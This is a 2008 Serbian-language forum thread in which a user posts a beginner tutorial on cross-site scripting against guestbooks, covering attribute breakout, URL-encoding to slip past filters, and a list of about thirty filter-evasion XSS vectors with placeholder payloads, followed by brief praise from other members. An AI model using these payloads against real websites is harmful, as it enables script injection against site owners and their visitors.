Koceljeva Forum
Would you like to react to this message? Create an account in a few clicks or log in to continue.

Koceljeva Forum


 
PrijemTražiLatest imagesRegistruj sePristupi

 

 XSS

Ići dole 
3 posters
AutorPoruka
archer

archer


Muški Broj poruka : 297
Godina : 31
Lokacija : Kamenica
Datum upisa : 23.06.2007

XSS Empty
PočaljiNaslov: XSS   XSS Icon_minitimeSre Jan 23, 2008 3:13 pm

================]XSS napad na web aplikacije[================
[>>by Archer<<]

Sadrzaj:

>>1 Uvod
>>2 Ranjiva mesta i kako ih iskoristit
>>3 Odvod
>>4 Literatura

=============================] 1 [===========================

Evo resio sam i ja da napism tutorijal na osnovu mog skromnog
znanja. Inace ovo sto u ovom tutorijalu pise mozete naci na
webu ali ja sa sve sto sam procitao skupio na jedno mesto. Da
bih pocetnicima olaksao pocetak. I tako nastaje ovaj tutorijal.
Primetio sam da svi u svojim tutorijalima pisu neka sranja kako
nisu odgovorni za ono sto pise u texstu. Red bi bio da i ja to
napisem da ne bih mozda naje*ao :-)

Upozorenje: Autor ovog texsta nije odgovoran za bilo kakvu
stetu koju nanesete uz pomoc ovog tutorijala. I ovaj tekst
ja namenjen samo u edukativne svrhe. Nisam odgovoran ni za to
sto mozete da izgubite vid, iskrivite kicmu dok citate ovo. Ko
se sa ovim ne slaze naka odmah ode na poglavlje 3.

=============================] 2 [===========================

U ovom tutorijalu necu se puno zadrzavati na dobijanju cookiesa
pomocu xss, vec cu vam pokazati kako izvesti xss u guestbook
(knjiga gostiju). Dakle najranjivije aplikacije na webu su
guesbookovi i bilo koje druge aplikacije koje vam daju mogucnost
da nesto upisete. Dakle da predjemo na stvar. Da biste razumeli
xss (cross side scripting) morate da znate najpre html i JavaScript
(ako ih ne znate onda nema svrhe da citate dalje, potrazite neki
tutorijal na netu, a mozda cu i da postujem neki ako vam se
ovaj bude svideo:-)). Dakle ako vidite negde u sourceu ovo
<input type="text" name'words' value='$nekavrednost'> onda
ova promenjljiva predstavlja vrednost onoga sto napisete u tekst
boxu. Ali kada biste vi napisali u txt box sledece:
'><script>alert('Hacked by Archer')</script> onda ova aplikacija
izvrsava sledece:

+---odavde nastavlja ono sto
| ste upisali u text box
|
|
<input type="text" name'words' value=' '><script>alert('hacked by Archer')</script>'>
I naravono ovo ce pokrenuti alert sa textom Hacked by Archer.
I dakle sada vi mislite idem da nadjem takav slucaj i da malo
hakujem. E pa neznate sve. Programeri su ,kada su hakeri ovo
smislili, smislili nacin da malo otezaju (kazem namerno otezaju jer
xss se moze izvesti bilo gde), tj. oni su napisali kod koji filtrira
podatke koje unosimo. Znaci mi krenemo da napisemo '> ali nece da
prihvati vec nam ispise neku poruku na monitoru kako neki znakovi
nisu dozvoljeni. Ali ima nacina da se to zavara npr. prebacite
vas zlonamerni unos u hex ili decimal. Za to je najbolje da nabavite
neki program za kriptovanje, ja koristim Quick Number Base Converter.
Mozete ga skinuti na netu. I kada ste prebacili vasu zlonamernu
poruku dobije nesto ovako:

%27%3E%3Cscript%3Ealert("Hacked%20by%20Archer")%3B%3C/script%3E
E ovaj kod filter nemoze da prepozna, ali su programeri opet
poboljsali filter da onemogucuje %3E (odnosno >). Ali su bad
gays opet smislili nacin za pokretanje alerta ili neke druge
skripte. I programeri su opet smislili nacin, a onda su opet
hakeri smislili naci i to ide u beskraj. Da se ja nebih mucio
da kucam po tastaturi ja cu da vam kazem neke od nacina da pokrenete
vasu skriptu. Evo liste:

<a href="javascript#[xss]">
<div onmouseover="[xss]">
<img dynsrc="javascript:[xss]">
<imput type="image" dynsrc="javascript:[xss]">
<bgsound src="javascript:[xss]">
<img src="&{[xss]};>
<link rel="stylesheet" href="javascript:[xss]">
<iframe src="vbscript:[xss]">
<img src="mocha:[xss]">
<img src="livescript:[xss]">
<a href="about:<script>[xss]</script>">
<meta http-equiv="refresh" content="0;url=javascript:[xss]">
<body onload="[xss]">
<div style="background-image: url(javascript:[xss]);">
<div style="behaviour: url([link to code]);">
<div style="binding: url([link to code]);">
<div style="width: expres​sion([xss]);">
<style type="text/javascript">[xss]</style>
<object classid="clsid:..." codebase="javascript:[xss]">
<style><!--</style><script>[xss]//--></script>
<![CDATA[<!--]]><script>[xss]//--></script>
<!-- -- --><script>[xss]</script><!-- -- -->
<<script>[xss]</script>
<img src="blah"onmouseover="[xss]">
<img src="blah>" onmouseover="[xss]">
<xml src="javascript:[xss]">
<xml id="X"><a><b>&lt;script>[xss]&lt;/script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div>

Ovo je samo deo nacina, postoji ih jos mnogo i samo cekaju na
vas da ih smislite. Dakle probajte da smislite nesto sami,
budite kreativni. Ja licno najvise volim xss u guesbooku. Xss
nije mnogo mocan napad na web aplikaciju, mozda je cak i najslabiji
ali je zanimljiv i meni licno drag Smile.
Da rezimiramo:
1.xss se moze izvesti sa vaseg browsera.
2.cil je da se "zatvori" vrenost neke varijable pomocu '>
3.kada ste "zatvorili" onda treba da zadate neku skriptu.
4.ako postoje filteri (mada i jos uvek postoje sajtovi bez
filtera, a vidjao sam ih to su u principu amaterski sajtovi koje
su pravili klinci koji su procitali par tutorijal o htmlu, i misle
da znaju sve, cak nisu svesni svojih gresaka.) onda probajte da ih
izbegnete pomocu kriptovanja.

=============================] 3 [====================================

Dakle ako ovo citate onda vam nije bilo dosadno. A ja nisam odgovoran
da ste slucajno zaspali i pali sa stolice i zavrsili na ortopediji :-)
Dakle nemojte odmah da pocnete da unistavate. Ima u ovoj oblasti jos da
se uci. Evo ga kraj samo jos da kazem da se nadam da ce biti jos ovakvih
tutorijala. Ako u ovom tutorijalu ima nekih gresaka, nemojte mi zameriti.

GreeTz t0:
>>baltazaru koji je otvorio ovaj topic (tutorijali)
>>Odeljenu M11 srednje skole "Veljko Vlahovic" Koceljeva. (Pozdrav drustvo,
najgori smo jel da :-))
>>Vama sto ste me udostojili da procitate ovaj tutorijal
>>I svima koje sam zaboravio.

=============================] 4 [===================================

Ovo sto sam napisao naucio sam na slidecim mestima:

>>http://www.phearless.org/
>>http://www.tutorijali.net/
>>http://www.tutorijali.org/
>>I na jos sto mesta

==========================] PozZzzz [================================
Nazad na vrh Ići dole
baltazar
Administrator
baltazar


Muški Broj poruka : 2253
Godina : 41
Lokacija : Koceljeva
Datum upisa : 01.12.2006

XSS Empty
PočaljiNaslov: Re: XSS   XSS Icon_minitimeSre Jan 23, 2008 3:16 pm

NIce i nastavi tako!
Nazad na vrh Ići dole
https://koceljeva.editboard.com
archer

archer


Muški Broj poruka : 297
Godina : 31
Lokacija : Kamenica
Datum upisa : 23.06.2007

XSS Empty
PočaljiNaslov: Re: XSS   XSS Icon_minitimeSre Jan 23, 2008 3:44 pm

hvala
Nazad na vrh Ići dole
sinner_01
Administrator
sinner_01


Muški Broj poruka : 1942
Godina : 43
Lokacija : Koceljeva
Datum upisa : 01.12.2006

XSS Empty
PočaljiNaslov: Re: XSS   XSS Icon_minitimeSre Jan 23, 2008 4:42 pm

extra bro,keep on doing it
Nazad na vrh Ići dole
https://koceljeva.editboard.com
archer

archer


Muški Broj poruka : 297
Godina : 31
Lokacija : Kamenica
Datum upisa : 23.06.2007

XSS Empty
PočaljiNaslov: Re: XSS   XSS Icon_minitimeSre Jan 23, 2008 7:55 pm

ocekujte jos tutorijala, napisacu ih kad budem imao vremena, trenutno sam u nekoj guzvi
Nazad na vrh Ići dole
Sponsored content





XSS Empty
PočaljiNaslov: Re: XSS   XSS Icon_minitime

Nazad na vrh Ići dole
 
XSS
Nazad na vrh 
Strana 1 od 1

Dozvole ovog foruma:Ne možete odgovarati na teme u ovom forumu
Koceljeva Forum :: Hi-tech :: Tutorijali-
Skoči na: